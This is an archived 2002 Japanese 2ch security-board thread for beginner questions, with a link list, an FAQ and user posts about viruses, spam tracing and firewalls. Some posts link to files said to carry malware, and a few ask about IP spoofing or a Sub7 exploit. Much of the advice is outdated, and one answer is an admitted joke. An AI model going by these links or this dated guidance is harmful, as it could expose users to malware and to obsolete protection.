くだらねぇ質問はここに書き込め　Ver2.19

くだらない質問は新規でスレを立てたり関係ないスレに書き込まずにこのスレに書いてください
掲示板の荒らし方や侵入の方法、メールボムの送り方等、攻撃方法の質問はご遠慮ください。
2ちゃんねるでは荒らし依頼は出来ません。また、この板ではアタック依頼は受け付けません。

★！超頻出！★
　2ch見ていたらvbsウィルスが検出された！
　→ノートンの誤検出です。↓のスレへどうぞ
　http://pc.2ch.net/test/read.cgi/sec/1025872269/

関連リンク >>1-20 ずれていたら>>1-40参照
各種ファイアーウォール IDS ログ解析ツール 日本語化パッチ
セキュリティチェックサイト whois 解説サイト 最新ウィルス情報 アドバイザリ他
関連スレ･関連板 お約束 FAQ

(winなら)[Ctrl]キーと[F]キー(macなら)[コマンド]キーと[F]キーを同時に押すとページ内検索が出来ます
過去スレや関連スレの過去ログ等を調べてから質問してください

同じ質問を複数の板やスレッドに書き込むマルチポストは嫌われます。
回答をもらえなくなるので、書き込んでしばしお待ちください。
お急ぎなら検索が早いかも？
http://www.google.com/intl/ja/

【各種 Firewall】
DoorStop Firewall (Mac用) http://www.opendoor.com/
ZoneAlarm http://www.zonelabs.com/
Tiny Personal Firewall (2.0.15Aはフリー、3.0はシェア) http://www.tinysoftware.com/
Kerio Personal Firewall http://www.kerio.com/
Agnitum Outpost http://www.agnitum.com/download/outpostfree.html
Sygate Personal Firewall http://www.sygate.com/
AtGuard http://download.lycos.com/swbasic/BasicResults.asp?query=atgd322
Look'N'StopLite http://www.looknstop.com/En/index2.htm

【各種 IDS】
BlackICE Defender http://www.toyo.co.jp/security/
Snort for Win32 http://www.datanerds.net/~mike/snort.html
Intact Open Use http://pedestalsoftware.com.cnchost.com/intact/compare.htm

【ログ解析ツール】
ICEWatch http://keir.net/icewatch.html
ZoneLog Analyser http://zonelog.co.uk/
TPF Log Analyzer (Tiny Personal Firewall用) http://server47.hypermart.net/tinyfirewall/

【スパイソフト発見ソフト】
Ad-aware http://www.lavasoft.de/downloads.html

【日本語パッチ等】
ZoneAlarm 日本語化パッチ その１ http://etcd.virtualave.net/
ZoneAlarm 日本語化パッチ その２ http://www.ryulife.com/net/security/index.html
Tiny Personal Firewall 日本語化パッチ (2.0.15Aまで) http://www.geocities.co.jp/SiliconValley-Cupertino/2943/
Kerio Personal Firewall 日本語化パッチ http://page.freett.com/nanasisan242/
Agnitum Outpost(日本語で使用可能)
ZoneAlarm Pro体験版 http://www.zonelabs.com/zap_download_trial_4.htm　
Sygate Personal Firewall 4.2 Build 872 http://blue.ribbon.to/~oga/
Sygate Personal Firewall 5.0 Build 1117 http://members14.tsukaeru.net/chy-lyricist/spf-jp/index.html

【セキュリティチェックサイト】
Shields UP! https://grc.com/x/ne.dll?bh0bkyd2
Shields UP!の日本語解説サイト http://www.upsizing.co.jp/news/report0426.html
Symantec Security Check http://security2.norton.com/common/1033/sym/sym_intro.asp
Secure Design - Port Scan Security Check http://www.sdesign.com/securitytest/
セキュリティサイトのリンク集 http://www.toyo.co.jp/security/ice/advice/Support/KB/q000026/default.htm

【Whois】
APNIC http://www.apnic.net/
JPNIC Whois Gateway http://whois.nic.ad.jp/cgi-bin/whois_gw
IPドメインSEARCH MSE株式会社 http://www.mse.co.jp/ip_domain/index.shtml

【解説サイト】
Firewall 解説サイト Fire & Forest http://eazyfox.tripod.co.jp/
Snort 解説サイト http://www.port139.co.jp/ntsec_snort.htm

【ウィルス情報】
IPAセキュリティセンター http://www.ipa.go.jp/security/isg/virus.html
Symantec Security Response http://www.symantec.com/region/jp/sarcj/
Trend Micro ウィルス情報 http://www.trendmicro.co.jp/virusinfo/index.asp
McAfee ウィルス情報 http://www.nai.com/japan/virusinfo/vinfo.asp　

【アドバイザリ他】
日本語
IPA/ISEC http://www.ipa.go.jp/security/
JPCERT/CC http://www.jpcert.or.jp/
英語
CERT/CC http://www.cert.org/
Bugtraq http://www.securityfocus.com/

【過去スレ･関連スレッド･関連板】
【過去スレ】
ver2.12 http://pc.2ch.net/sec/kako/1002/10021/1002134745.html
ver2.13 http://pc.2ch.net/sec/kako/1009/10097/1009795619.html
ver2.14 http://pc.2ch.net/sec/kako/1014/10141/1014116411.html
ver2.15 http://pc.2ch.net/sec/kako/1017/10179/1017903445.html
ver2.16 http://pc.2ch.net/sec/kako/1021/10212/1021270127.html
ver2.17 http://pc.2ch.net/sec/kako/1024/10249/1024963492.html
ver2.18 http://pc.2ch.net/test/read.cgi/sec/1026717316/

【無料FW】
ZoneAlarm Part7
http://pc.2ch.net/test/read.cgi/sec/1027925885/
Tiny Personal Firewall Part4
http://pc.2ch.net/test/read.cgi/sec/1015535895/
Kerio Personal Firewall Rule3
http://pc.2ch.net/test/read.cgi/sec/1022081681/
Agnitum Outpost Firewall Part2
http://pc.2ch.net/test/read.cgi/sec/1025655522/
SygatePersonalFireWall part3
http://pc.2ch.net/test/read.cgi/sec/1028486449/
【FireWall】Look'N'Stop
http://pc.2ch.net/test/read.cgi/sec/1021856163/

【無料AV】
無料ウィルス用ソフトAVP/AVG/Ad簡(その２
http://pc.2ch.net/test/read.cgi/sec/1027400238/
H+BEDV Antivir Personal Edition Part2
http://pc.2ch.net/test/read.cgi/sec/1016561367/
【フリー】AVG Anti-Virus　Version3
http://pc.2ch.net/test/read.cgi/sec/1028117622/
アンチドートを語ろう♪
http://pc.2ch.net/test/read.cgi/sec/1003987914/

【有料FW&AV】
＿■■■BlackICEスレ 2■■■＿
http://pc.2ch.net/test/read.cgi/sec/1012458984/
Win XPのファイアーウォール
http://pc.2ch.net/test/read.cgi/sec/1001149463/
【ノートン】ｲﾝﾀｰﾈｯﾄｾｷｭﾘﾃｨ2002 Ver.10
http://pc.2ch.net/test/read.cgi/sec/1026543973/
ウイルスバスター２００２ Part４
http://pc.2ch.net/test/read.cgi/sec/1021091165/
がんばれマカフィー
http://pc.2ch.net/test/read.cgi/sec/1020474494/
｜･)ﾉｺｿｰﾘとマカフィー＠難民板
http://ex.2ch.net/test/read.cgi/nanmin/1016347609/

【その他】
初心者用質問スレッド Part13
http://pc.2ch.net/test/read.cgi/sec/1026862203/
☆ウィルス情報＆質問　総合スレッド☆part5
http://pc.2ch.net/test/read.cgi/sec/1027397623/
最強のウィルス対策用ソフト
http://pc.2ch.net/test/read.cgi/sec/1000957607/
ファイアーウォールソフト 総合スレッド Part3
http://pc.2ch.net/test/read.cgi/sec/1016238340/
最強のファイアーウォールソフトって何かな？
http://pc.2ch.net/test/read.cgi/sec/988724444/
スパイウェア発見専用ソフト｢Ad-aware｣　part2
http://pc.2ch.net/test/read.cgi/sec/1020360932/
●セキュ板 雑談スレッド●[４]
http://pc.2ch.net/test/read.cgi/sec/1013427349/
OE(又はIEｺﾝﾎﾟｰﾈﾝﾄ使用ﾒｰﾗｰ)の問題点とその対策方法
http://pc.2ch.net/test/read.cgi/sec/1021363841/
ＩＥ５・５と６・０、ネット閲覧ソフトに欠陥
http://pc.2ch.net/test/read.cgi/sec/1005605775/
Klez.E、Klez系スレッド part3
http://pc.2ch.net/test/read.cgi/sec/1024255721/
●ＨＤＤ全消去ウイルス３●
http://pc.2ch.net/test/read.cgi/sec/1024943662/
住基ネット祭　その2
http://pc.2ch.net/test/read.cgi/sec/1028557928/
A.D.200X@Random (6)
http://pc.2ch.net/test/read.cgi/sec/1024202843/

パソコン初心者＠2ch掲示板 http://pc.2ch.net/pcqa/
初級ネットワーク＠2ch掲示板 http://pc.2ch.net/hack/
windows＠2ch掲示板 http://pc3.2ch.net/win/
ソフトウェア http://pc3.2ch.net/software/
ダウンロードソフト(download板) http://tmp.2ch.net/download/
パソコン一般＠2ch掲示板 http://pc3.2ch.net/pc/　
通信行政 http://cocoa.2ch.net/regulate/
プロバイダー http://pc3.2ch.net/isp/
ネットサービス http://pc.2ch.net/esite/
ネットwatch http://choco.2ch.net/net/

【お約束】
○ウィルスやブラクラのリンクを張るときは･･･
　他の方が誤ってクリックしても問題ないよう、直リンは避けてください。
○アダルトサイトに行くときは・・・
　インターネットオプション→セキュリティ→インターネット→レベルのカスタマイズ
　→ActiveX、JAVA、アクティブスクリプトを全て無効にしてください。
○怪しいリンクを踏むときは･･･
　IEでview-source://URLでソースを表示して判断してください。Javaスクリプトなどは実行されません。
○リンク先を直接見るときは・・・
　「対象をファイルに保存」して一旦ファイルにし、メモ帳で一度開いてください。
○メールチェックをしたら、怪しいメールが届いていました・・・
　開かずに捨ててください。捨てようとしてクリックした時に感染する恐れがありますので、
　OEのプレビュー機能を必ずオフにしてから削除してください。
○IE4.0、IE5.0、IE5.5を使用しています・・・
　IE4.0は今後不具合が発見されてもフォローされません。IE5.5SP2かIE6.0に乗り換えてください。
　IE5.0、5.5の方はSP2にアップデートの後、各種パッチを当ててください。
○ウィルス対策ソフトを入れていますが･･･
　パターンファイル(ウィルス定義ファイル)を更新していなければ意味がありません。
　感染する前に定期的にチェックしましょう。

【FAQ他】
　【IE&OE】
○OEのプレビューをオフにするには・・・
　OEのメニューバーにある「表示」→「レイアウト」→「プレビューウィンドウを表示する」のチェックを外してください。
○メーラーにOEを使っていませんのでウィルスメールを開いても、自動的に実行したりしませんよね･･･
　メーラーがOEでなくても、IEコンポーネントを利用してHTMLメールを表示する場合は、
　IE、OEの不具合を引き継ぐことになります。ですので、自動的に実行しないとは言い切れません。
○アダルトサイト閲覧中に突然ファイルをDLして、デスクトップにアイコンが出来てしまいました・・・
　アイコンのプロパティからリンク先を表示で出てきたファイルをアイコンとともに削除してください。
　MS-DOSプロンプトを起動して、msconfigで見慣れないものを削除してください。
　C:\windows\Downloaded Program Files\にあるファイルを削除してください。
　MS-DOSプロンプトを起動して、scanreg /restoreも効果的です。
○いつの間にかIEのスタートページと検索のページが書き換えられていました・・・
　ウィルス対策ソフトを試してみて、Trojan.JS.Offensiveならインターネットオプションから再設定してください。

　【IPアドレス】
○IPアドレスを見るにはどうすれば･･･
　自分のIPアドレスを見るにはMS-DOSプロンプトを起動して、winipcfg(9x系)かipconfig /all(NT系)を実行してください。
　他人のIPアドレスを見るにはMS-DOSプロンプトを起動して、netstat -an
を実行してポート番号から判断してください。
○IPアドレスから個人情報が抜かれたり･･･
　プロバイダがもっている情報は公権力が無い限り、外部に公開することは無いと信じてください。
　それよりも、コンピューター上のファイルなどから判断することの方が容易かもしれません。
○IPアドレスから利用しているプロバイダを知りたいのですが･･･
　>>2-5の【Whois】を利用してください。

　【掲示板】
○掲示板が荒らされて困っています･･･
　注意、警告、放置、削除、一時閉鎖、利用制限、通告、完全閉鎖
　冷静に判断、選択し、対応してください。困っているのは貴方だけではありません。
○掲示板の利用者のIPアドレスは抜けますか･･･
　HTMLソースに書いてあることもありますが、無いこともあります。
○PCから携帯電話専用のページを見たい
　UA（ユーザーエージェント、ブラウザなど）で判定しているページなら偽装で可能。
　ただし、それで見られるページというのはあんまり…　

くだらない内容の単発質問スレを立てて、
煽られ罵られながらもこのスレへ誘導された方へ
下記にて単発質問スレの削除依頼をしてから、
質問を書き込んでください。

▽セキュリティ板スレッド削除依頼▽
http://kaba.2ch.net/test/read.cgi/saku/991559247/
こちらへ「必ず "age" で」該当するスレのタイトルとリンク、
削除の理由を添えて削除依頼を出してきてください。
削除されたら「必ず "sage" で」御礼をしてきてください。　　

鯖についての質問もここでいいのかな？
ダウンロードツールを使ってごっそりファイルを持って帰る厨を追い出したいのですが
どうしたらいいでしょうか？
環境変数を見てApacheの設定を変えるのが良いのでしょうか？

>>11
mod_throttle とかどうよ

>>1
新スレ乙ー。

ちと質問。
Windows用でフリーのホストベースIDSって何かありましたでしょうか？

>>13
samhain とかかね?

2chに書き込んだら80番ポートが開いてます
といわれたのですが危険ですか？
どうすればよいですか？

>>15
危険じゃない

>>1
乙。
npopみたいにメールサーバーのメールを直接削除
できるツールも紹介しておけばいいかも。

これにウィルス（WORM_KLEZ.H）が入ってるって説があるけど、いろいろチェックしても検出されませんでした。
入ってないと思いますが、どうでしょうか？
＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿

579 ：577 ：02/08/05 05:43
urakouya.mydns.to/~urakouya/main/gaibusouko/gaibusouko_dat_uhauha/jpg.zip

>>578＆見てない人。
まとめてうｐしてみた。俺が保存したのは29枚。4メガちょい。ZIPパス：jal123

http://curry.2ch.net/test/read.cgi/occult/1028018642/579
＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿

入ってる説
615 ：あなたのうしろに名無しさんが・・・ ：02/08/05 17:35
>614
>>579は何か余分なもの入ってないか？ノートンが激しく反応するんだけど。
http://curry.2ch.net/test/read.cgi/occult/1028018642/615

WORM_KLEZ.H
http://curry.2ch.net/test/read.cgi/occult/1028018642/634

前の板の最後のほうに書いたんで、もっかいここに書きます。

jdbgmgr.exe はウィルス実行のファイルだから消せ！っていう
チェーンメールが出回ってるようなんですが、デマですよね？
このファイルが何のためにあんのかは知らないんだけど。

>>19
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/virus/false/jdbgmgr.asp

>>19
これ見
ttp://www.ipa.go.jp/security/topics/alert140515.html

>>19
ここは質問スレッドです
雑談は他の場所で

ちょっとお聞きしたいのですが、adslでIPアドレスを
変えたいのですがどうすればいいのですか？

>>23
（　´,_ゝ｀）ﾌﾟｯ。
まず、IPアドレスの意味を調べろ。
ADSLではIPアドレスは固定されていて変えられない。
変えたければダイヤルアップIP接続にしろ。

>>24
システム的に固定IPになってなければ方法はあるだろ。>>23の条件だけでは回答は無理だが。

NATを解除すればなりますか？

>>23
あんね、ADSLと一言に言ってもIPアドレスの割り当て方法は沢山あるの。
それを全部解説するほど暇ではない。

>>27
TCPでIPアドレス偽装する方法を聞いてんだよ、タコ。

>>23
Booker-T?

すまんがお力を貸してください
http://www.3q3q.com/
がスパム（題名に広告とも入れてない）を送ってくるんでこいつの
プロバかレンタル鯖元に文句垂れ込もうと思うんだが良く分からん
のです。IPドメインSEARCH使っても出てこないし

ただこのメールがいらない時は・・・ってのに
http://202.220.156.155/d/t9fy&m=***@***.ne.jp
とあったのでこいつを調べたら
http://www.gvn.ad.jp/index.html
が元でした。これがそうとは言い切れないのでTracert使ったの
ですが何か無線のプロバ？らしきものしか出てこないし・・・

MXやってったらいきなりモニターが消えました。
何ででしょうか？

>>30
出てきたがな

Registrar: Go Daddy Software (http://registrar.godaddy.com)
Domain Name: 3Q3Q.COM
Created on: 07-Mar-00
Expires on: 07-Mar-03
Last Updated on: 06-Mar-02

Administrative Contact:
Support, Technical [email protected]
101BEST, INC.
11310 S. O. B. T. #395
Orlando, Florida 32837
United States
(407) 812-4486 Fax --

>>32
それってドメインの管理元ですよね？
ってことは自鯖なんでしょうか？
プロバさえ分かれば・・・

>>33
http://202.220.156.155/d/t9fy&m=***@***.ne.jp
見に行ったら思いっきり住所と電話番号書いてあったが

>>33
レンタル鯖の管理元だ
Webサーバが立ち上がってるかどうかくらい確認してみたらどうだ？
http://101best.com/

>プロバさえ分かれば・・・

プロバイダのメールサーバから送られてきたものなのか？
恐らく違うだろ？
上記ドメインのメールサーバからじゃないのか？
プロバイダにねじ込んで一体どうするつもりだ？

イライラしてるんで言葉がキツイな。スマン。

>>34
すみません、住所や電話番号はいいんです。
要は第三者、レンタル鯖かプロバが分かればと思いまして・・・

メールのヘッダー見て、こいつがスパムで利用していると思われる
http://www.combzmail.jp/　と　スパム処理の日本産業協会に
連絡してきました

つまりメール解除のサイト
http://202.220.156.155/　がこいつの本拠地と見て良いのでしょうか？
あとは
http://www.gvn.ad.jp/index.html　に連絡すれば良いのかな？

>>23
マルチポスト氏ね
かなり悪質なので通報しますた

http://pc.2ch.net/test/read.cgi/hack/1025625440/l50
http://pc.2ch.net/test/read.cgi/hack/1028512518/l50
http://pc.2ch.net/test/read.cgi/hack/1027962665/l50
他もあり

>>37
そういえば「IP変えたい、隠したい」は馬鹿の証明だしな。

>>35
度々すみません。36を書き終えた時に35を見かけまして
ちょっとすれ違いになってしまったようです
紹介されたサイトで調べて見たら
3q3q.com: 64.33.93.13　と出てきました。
http://www.iana.org. ？

一応解決？しました

以下今日来たメール

特選市場３Q事務局です。

このたびは大変なご迷惑をおかけして申し訳ありませんでした。
私どものチェックが足りずにお宅様にいやな思いをさせてしまいました。
今後ともこういうことがないように致しますので、
何卒ご容赦くださいませ。

申し訳ありませんでした。

　　　　　　　　　　　特選市場３Q事務局

ここまで。
まあ、垂れ込める場所は垂れ込んでおいたので
あとは結果待ちです
今までどうもありがとうございました

すいません。個人のメアドから住所を割り出す方法を教えて下さい。

http://natto.2ch.net/test/read.cgi/yahoo/1025687690/578

>41
裁判所に捜査令状をもらって警察からプロバイダに問い合わせてもらう。

度々すいません。ＩＰアドレスに郵便物を出したら届きますか？

http://natto.2ch.net/test/read.cgi/yahoo/1025687690/578-582

>>43
ネタは別のところでやってくれ

すいません、
「楽天グルメニュース」というメルマガが届いたのですが、
添付ファイルがついていて、しかもそれが38kbもあります。
普段なら楽天なんて気にもとめないのですが、
どうも気になって…
ちなみにノートンは何も感知しませんでした。

>>45
それじゃ、わからん。
添付ファイルのファイル名ぐらい書いておくれ。

>45
tu-ka,メールにはなんて書いてあったのよ？

>>46
添付ファイルの名前は、どこで見ればよいのでしょうか？
厨房ですみません

>>47
まだ開いてはいないのですが、
つるつるっと喉ごしのいい「麺」特集【楽天グルメニュース】
とあります。

「楽天グルメニュース」読んでる奴いないかな？

ネット使用してないのに、いつもモデムのアクセスランプが点滅しています。
　これはウイルスなんでしょうか？ちなみに、ＣＡＴＶを使用しています。

>>50
お使いの CATV にお問い合わせください。

>>50
CATVだからじゃない？

ここで質問していいのか分かりませんが、
今日PC雑誌を見てたら
「ゴミ箱」から「削除」したデータは
そのデータに「削除した」と言うデータが追加されるだけで
データ自体が消える事はない、と言うような事が書いてありました。

うちはそろそろHDDがいっぱいいっぱい（残り700M）なので
半分くらい削除して軽くしようとしていたのですが
それはもしかして無意味というか無理なのでしょうか？

>>53
新しいデータがくれば、その見かけ上消えているデータの上に
新しいデータが上書きされ、本当に消えるってことなんだけど。

>>53
消した後デフラグするといいんだっけ？

なるほど！！
もううちのHDDは使えないのかと思ってしまいました…
こんな質問にどうもありがとうございました

>>53
つーか、余りにも低レベル過ぎる
ＰＣ初心者板に行ってもバカにされると思う

>>50
隣の家の通信が来てるだけ

>>58
　え？どういう事ですか？

教えてください。
無線LANの接続方法に二種類ありますけど、
アクセスポイントのある無しで
判断してますが、アクセスポイントなくても
ネットに接続できるみたいなのですが、
両者は具体的にどのように違うのでしょうか？

最近ヤフーBBに変わったんだけど、ヤフーBBは串を通せるんですか？なんか通らないみたいで…（＾＾）

>>60
日本語か？

>>59
CATV 側がデータを常に流している。ルータの方でデータを選別している。
いらないデータが来たら、捨てている。だから光る。

>>60
質問の意味不明。

>>61
外部串なら刺せる

>>60
意味がわからん

ブラクラ？
鑑定してください
http://www.jazior.cjb.net

http://members.tripod.com/clannad12345/Clannad.zip
このファイルなんなんスかね？
馬鹿な俺には全然わかんないんスよ。
頭悪いし、目つき悪いし、足臭いし、おまけに水虫だし
臭いかくとクラクラするし、目にシュムし
クレバーな方、教えてくれないッスかねぇ、懸想するよぉ　ＣＨＵ！

>>64外部串ってなんすか？

自分のHPに荒らしが来てるんですけどどうすればいいんですか？
友達がIP抜けって言ってたんで調べてみたんですけど
それをどうすればいいのかわかりません。

>>68そのHPのURLは？

>>69
すいません、それは勘弁してください。
どうすればいいんですかね？

>68
>>10

>>68
知り合いのIPと照らし合わせて犯人探し。

>>68
>>10。そいつをIPレベルで弾け。以上。

>>70
１．IP を抜いたと警告する
２．IP を実際に書き込む
３．IP ではじく
４．該当プロバイダ丸ごとはじく

>>55
ふつーはツール使って0とか乱数とか無意味なデータ埋め込んだりするな。

>>67
そのくらい調べろ。

>>73
罠の張ってある偽のページにリダイレクトする方が面白い。

みなさんは、メールソフトにウイルスメールが来たら
どのように削除していますか？

>>76
選択して delete 以上。終了。
Datula 使ってるので感染の心配なし。

＞７７
すいません、すっごく初心者なのですが、
Datulaってなにですか？

>>75調べたけど分からない

>>78
"Datula" とは、シェアウェアのメーラーです
力ぬけちゃうから、こまっちゃう…

>>76
とりあえず開かずにデスクトップに全て保存
そんでもってＮＡＶで鑑定
デスクトップのファイルは全部shift＋delで削除
メールは既読にしてメールソフトのウィルスコレクション用フォルダに移動

＞８１
メールを開封しないで、削除したくても
選択すると、中身が見えてしまいます。
選択してもメールが開かないようにするには
どうすればよいでしょうか？

>>76
そういうヘボいソフトを使うのをやめる

か

そのヘボいソフトのヘルプをよく読む

日本ではノートンとバスターが総勢力みたいだけど、じゃあ
不正アクセスの本場海外で一番メジャーで信頼のおけるセキュリティ
ソフトってなんですか？

>>84
セキュリティソフト？

すみません。困りました。ってか何度やってもわかりません。
win98/Meですが、win2000/Meならできたでました。
IEのツール・詳細設定ってとこにREGファイルを結合ってしたら2000では追加されたのに。
98だと追加されませんでした。2000と98じゃ違うのか同じなのはわかりませんが、できませんでした。
ここにそのREGファイル書いてもいいのかわかりませんが。・・・教えてください。お願いします。

>>86
日本語を覚えてから質問に来い

うむ。
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\Bakera]
"RegPath"="SOFTWARE\\Microsoft\\Internet Explorer\\Main"
"Text"="文字"
"Type"="***"
"CheckedValue"="***"
"UncheckedValue"="***"
"ValueName"="***"
"DefaultValue"="***"
これを詳細設定のとこに追加したいのですができません。
教えてくださいお願いします。

>>87
まぁ。変な日本語ですがおしえてください。( ^.^)( -.-)( _ _)

いきなりNimadaくらいました。
最近添付ファイル付きのメールは来てなかったし、
WindowsUpdateもちゃんとしてたのに、何時の間にか
感染してました。

ネットゲーやるために、ノートン切ってたのが悪いと言えば
悪いのだけど、あちこち調べたら、メールの添付ファイルに注意して、
WindowsをUpdateしてたらNimdaは感染しないとなってるのに、なんで？

あ、感染ファイルは自宅のＬＡＮで共有にしてたディレクトリに
有ったのですが、もしかして共有しっぱなしもまずいんですか？

ちなみに、ネットワーク先のＰＣは長い事立ち上げてもないので、
そちらからという事はないと思います。

Nimadaとか間違ってるし･･･。
連かきこすみません･･･

↑ウィルス対策はしとるのか？

90で書いたように、ネットゲーやるときに切ってました。
ネットゲーが終った後、そのままメール見たりＨＰ見たりすることが
有ったから、今思うとウイルス感染自体は有り得ると思います。

ただ、Nimdaの詳細を調べてると、メールの添付ファイルか、
パッチを当ててないＩＥで感染したＨＰを見ない限りは、
感染しないような事が書いてあったので、この二点については
どちらも対処してるから、どこで感染したのか不思議なのです。

>>90
ネットゲームやるのに Norton の設定できないおまえに問題あり。
しかも、nimda の詳細をちゃんと読んでない。メール, IE 以外の
感染手段あり。

ネットゲーの対応は、そのゲームが他のアプリがプライマリになった瞬間、
強制終了する仕様になっているので、恐くて使用できないのです。
ゲーム中にアイテム落とす->直後アタックがあってノートンが
でしゃばって来る、なんてなるとアイテムロストしてしまうような
ゲームなので･･･

感染源についてですが、ＭｅマシンなのでメールかＩＥだと
思ったのですが、他にもあるのでしょうか？

>>90
91 で自分で書いているじゃん。感染原因。
IIS 入れてたらビンゴ。

某サーバの snort の log なんか見ると、
いまだに nimda のアクセスを見かけるぞ。

>97
いや、別にサーバー立てたりしてないので、IISはないと
思うのですが･･･
それとも、Ｍｅのデフォルトのインストールで設定されて
しまう物なんですか？

>>98
日本語の勉強からやり直せ。以上。終了！

100げと！＼(^O^)／

すごく急いでます。できれば即レスください。一応検索しました。
ルータの設定なんですが、適応インターフェイスとは何ですか？
lis1 lis2 lis3 .......poa1 po2 .......とか色々書かれてます。
どうか適応インターフェイスについて教えてください。お願いします。

すごく急いでルータの説明書を取り出し、
すごく急いで適応インターフェイスの欄を読め！

>>14 　遅レススマソ。 　Windowsにネイティブ対応したホストベースIDSってないのかなと 気になっているんです。 　Cygwin使ってもいいんですけど、使わなきゃ使わないで楽だなー とか思ったり。 　RealSecureを個人で導入できれば全て解決なんですけどね(w

w3mで書き込んだら改行が…見にくくてごめん。

w3mは悪くない
w3mは悪くない

>>99
90が日本語で間違ってるようには見えないが。

CのルートディレクトリにいつのまにかAutoexec.camなんてファイルが
出来てるんですがこれって何なんでしょうか？
サイズは0バイトでメモ帳で開いても何もありません。
OSはXPホームエディションです。

>>107
気にするな

ルーターの設定で、今あけてるポートの一覧を見る方法はありますか？

自分にポートスキャン。
IPアドレス打ち間違えると逮捕される諸刃の剣。

>>107
自動で実行される（AUTO-EXECutive）小型カメラ（miniCAM）用ファイルです。
WindwosXPからカメラなどのマルチメディア対応がより強化されシステムに組み込まれました。
小型カメラのついている型のパソコンでなければ放っておいて構いません。

嘘。

ていうかAutoexec.batの半自動バックアップなんで放置しれ。XPやMeならまず使わんし。
うちのWin98なんか.bakと.camと.issと.pssがあるぞ。どんどん増えて鬱だ。

mpgファイルにウィルスを仕込むことは可能なものなんでしょうか？

>>110
ポートスキャンだけで逮捕されるか？

>>113
FBIの鯖にポートスキャンかければわかる

>>113
いちいち書くのも風情がないが、いきなり逮捕はされない。
ただ、業務妨害等と見なされる可能性は有。要弁護士。

ウィンドウズ９８が変なんです。
右上の×や四角や棒のボタンが数字に変わっているんです。
スクロールの三角も数字なんです。
これってウイルス？
でも、でもノートンでは検出なしです。
WINは入れ替えるから良いとして、もしウイルスで会社のみんなに
うつしていたらと思うと心配で心配で。
誰かわかる人いますか？

>>116
ttp://homepage2.nifty.com/winfaq/fontstrouble.html

Temporary Internet Filesに、削除が出来ない文字化けしたファイルが３つ
あって、オンラインスキャンをしようとすると警告文が出て、
ブラウザが閉じてしまいます。

ノートンでスキャンすると必ず引っかかるのですが、削除してから何時間かすると
また、同じトロイが発見されてしまいます。
こういう場合は一体どうすればいいのでしょうか？

>>118
IEのプロパティ→全般→ファイルの削除

でも詳細も何もわからないから、「それだけじゃわからん」、って書いとく。

＞IEのプロパティ→全般→ファイルの削除

でも詳細も何もわからないから、「それだけじゃわからん」、って書いとく

最初にそれを試したのですが、削除している途中で必ず
応答なしになって、そのままフリーズしてしまうのです。
手動でも削除できませんでした。

>>118
>ノートンでスキャンすると必ず引っかかるのですが、

なんていうなまえでけんしゅつされるですか？？

>>118
OSと検出名と名前と状況。。。。。

削除してしまったのでうろ覚えなのですが、love letterと言う文字が
含まれていたと思います。トレンドマイクロのサイトで調べてみたのですが、
似たような名前のものはたくさんあったのですが
いまいちよくわかりませんでした。

くだらない質問ってどんな質問ですか？

>>118
まさか、これ？
http://pc.2ch.net/test/read.cgi/sec/1025872269/

OSはwindows98です。

いえ、vbsウィルスのソースが貼られたスレを見ると
ノートンが誤反応するのは知っていました。
多分、本物のLoveletterだと思います。
家族が勝手にネットに繋いだ時に、変なメールを開いたり怪しいリンクを
クリックしてしまったようです。

今からちょっと出かけなければいけなくなってしまったので、
また後でここを見に来ます。
アドバイスしてくださった方、どうもありがとうございました。

>118
逝ってらっしゃいな。

>>117さん ありがとうございます。
ウイルスでなくて安心です。

たびたびすいません、>>45です。
メールを一度フロッピーに落として、Macで開いてみました。
でも何故かmidiファイルとして変換されてしまって何が何やら(;´Д｀)
音楽のついたメールかと思ったのですが、何だかその音楽も奇妙です。
誰かこのメールの謎についてお答え下さいませんか？
>>49さんのおっしゃっているように、
楽天グルメのメルマガを購読している方がいらっしゃると嬉しいのですが…

>>131
何かのウイルスのコンテンツタイプスプーフィングングのなれの果て、とか。

つまんで捨てたらどうでしょ。
もちろん、バシリスクをインスコしたMacで開いて遊ぶって手も、アリです。

すみません、なんか勝手にデスクトップに
変な絵が描かれてしまったんですが（自分で描いたんではなく、勝手にです）
これもウイルスかなんかでしょうか？ご教示お願い致します。
ttp://isweb39.infoseek.co.jp/diary/mememela/source/820.jpg

>>133
マイドキュンを直せば直るよ

ひとつ質問させてください。
メールを送信する際にウイルスチェックがかかるわけですが、(NIS2002使用)
メールも出していないのに急にウイルスチェックが入り、
不審に思ってNISの接続ログをみてみると、

日付: 2002/08/07 時刻: 22:41:25
接続: www.big-z.net(210.224.181.7): smtp(25) に WIN(61.115.162.240): 1175, 875 ﾊﾞｲﾄを送信, 535 ﾊﾞｲﾄを受信, 9.834 経過

とあります。
こんなサイト普段いかないのに・・・。
これってトロイなどを仕掛けられてるのでしょうか？
ウイルススキャンは先日行ったばかりなんですが・・・。

www.big-z.net
････ぁゃιぃ(w

>>133
んんんん
どこかに他人のデスクトップに落書きするジョークソフトがあったような．．．？

>>133
そのまえに、｢ﾏｲﾄﾞｷｭﾝ｣の中身をｵｼｴﾅｻｲ

AVGで毎日スキャンしてるのにウイルスに感染したファイル(ネットからDL)
がありました。どうすればいいですか、捨てたくないんですが。

>>139
ちなみにｳｲﾙｽ名は??

>>131
midi とか MP3 のファイル名でくるウィルスあるよ。
それで mac が誤認識した可能性あり。

>>140 ホットメールに添付しようとしたらウイルスに感染してるので
送れませんと出ました。なのでウイルス名はわからないです。

今日初めて不正アクセスを受けました。ファイアウォールでブロック
したようですが、不正アクセスとは頻繁に起こりうるものなのでしょうか？

>>142
パターンファイルちゃんと更新してる（？）AVGぢゃ引っかからないのに、
ホットメルではぢかれたの？？

拡張子lzhだったりして。。。
空耳だ・・・忘れちくりょ

>>135
big-zは子供だましのアクセス解析やってるサイト。
JavaアプレットかActiveX仕掛けられたんだろう。

韓国のネチズンより，いまだにワールドカップ時に
抜かれたIPでトロイの木馬攻撃を受けるんですが，何とかできないでしょうか？
今のところはノートン先生でブロックしてます。

SuB7ｸﾗｲｱﾝﾄ落とせるｴｸｽﾌﾟﾛｲﾄって有るの?

･･･と何気なく質問して見るﾃｽﾄ

>>143
具体的にどういったアクセス内容なのかが問題
